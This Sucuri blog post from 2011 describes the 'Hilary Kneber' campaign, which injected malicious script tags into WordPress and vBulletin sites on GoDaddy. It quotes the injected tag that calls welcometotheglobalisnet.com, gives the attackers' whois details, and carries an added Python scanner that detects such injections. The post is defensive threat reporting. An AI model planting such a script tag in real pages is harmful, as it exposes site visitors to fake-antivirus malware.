
Sucuri Blog

Website Security News


Hilary Kneber Strikes Again – welcometotheglobalisnet

February 19, 2011, by David Dede


It seems that after a few quiet months, the “Hilary Kneber” group is back at it again. Their latest approach is typical of Hilary Kneber-style attacks affecting GoDaddy shared hosts: they modify every PHP file and the database to make sure every page of the infected site loads malware.

Today, we’ve started to see various WordPress sites infected with the following malware:

<script src="http://welcometotheglobalisnet.com/js.php?kk=25"></script>

Update 1: We are seeing some vBulletin forums with the database infected, so it is not restricted to WordPress.
Update 2: If you need help cleaning up your site, we can do it for you: http://sucuri.net/signup

The injection infects every post in the WordPress database and also modifies all PHP files to generate the above code. Note that the domain is not blacklisted yet, so the risk is very high for anyone visiting an infected site.
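A defender's check for the injection described above, as an added example (not code from the original post or from Sucuri): it scans files under a web root and exported post bodies for external `<script src>` tags, flagging the domain named in the post and listing any other host not on an allowlist. The function names, `ALLOWED_HOSTS`, and the sample files and rows in `demo()` are constructed assumptions.

```python
import os, re, tempfile
from urllib.parse import urlparse

# Indicator from the post; ALLOWED_HOSTS is a hypothetical per-site allowlist.
KNOWN_BAD = {"welcometotheglobalisnet.com"}
ALLOWED_HOSTS = {"ajax.googleapis.com"}
SCRIPT_SRC = re.compile(  # tolerates a missing "=", any quotes, "//host" URLs
    r"<script\b[^>]*?\bsrc\s*=?\s*[\"']?\s*((?:https?:)?//[^\"'\s>]+)", re.I)

def classify(text):
    """Return [(host, verdict)] for each external <script src> in text."""
    hits = []
    for url in SCRIPT_SRC.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if host in KNOWN_BAD or host.endswith(tuple("." + b for b in KNOWN_BAD)):
            hits.append((host, "known-bad"))
        elif host not in ALLOWED_HOSTS:
            hits.append((host, "unreviewed"))
    return hits

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a web root; return {relative_path: hits} for files with findings."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = classify(fh.read())
                if hits:
                    findings[os.path.relpath(path, root)] = hits
    return findings

def scan_rows(rows):
    """rows: (row_id, content) pairs, e.g. exported post bodies."""
    scanned = ((rid, classify(body)) for rid, body in rows)
    return {rid: hits for rid, hits in scanned if hits}

def demo():
    """Constructed sample: one infected file, one clean file, three rows."""
    bad = '<script src="http://welcometotheglobalisnet.com/js.php?kk=25"></script>'
    ok = '<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.0/jquery.min.js"></script>'
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.php", "<?php ?>\n" + bad), ("clean.php", ok)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        files = scan_tree(root)
    rows = [(101, "Hello " + bad), (102, "plain text"),
            (103, "<script src='//cdn.example.net/w.js'></script>")]
    return {"files": files, "rows": scan_rows(rows)}
```

This only matches the tag where it appears literally in a file or row; PHP that builds the tag at runtime also needs the rendered page output checked with `classify()`.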

What happens when someone clicks an infected site?

What the malware does is very simple: it contacts a few domains.

Those domains will then try to infect the visitor via their browser (with a fake antivirus). We are still analyzing the infected sites, and we’ll post more details as they’re discovered.

Here is the whois for the group responsible:

Registrant Contact:
HardSoft, inc
Hilary Kneber anatoliy@tom.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Administrative Contact:
Hilary Kneber anatoliy@tom.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Technical Contact:
Hilary Kneber anatoliy@tom.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

If your site is infected with malware and you need help, visit Sucuri and we’ll get you cleaned up.


Categories: Web Pros, Website Malware Infections, WordPress Security
Tags: Hacked Websites, Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. Blkcatgal

    February 20, 2011

    How does one prevent them from infecting your site?? My site is hosted at GoDaddy. Is there anything I can do to protect my site from getting infected? (It’s been infected in the past.)

    • rvtraveller

      February 20, 2011

      Do what I did: Change hosts. I got tired of GoDaddy giving me crap about how it was my site’s software and scripts that were causing it to happen and moved to HostGator. Hasn’t happened to my site since (but has infected GoDaddy, in fact it happened right after I transferred and GoDaddy copy of my site was infected, HostGator copy was not).

      • Blkcatgal

        February 20, 2011

        I’ve been planning to do this…guess I better quit procrastinating and do it!!

        • carlos

          February 22, 2011

          Yes…. I am done with GoDaddy. Moving this week
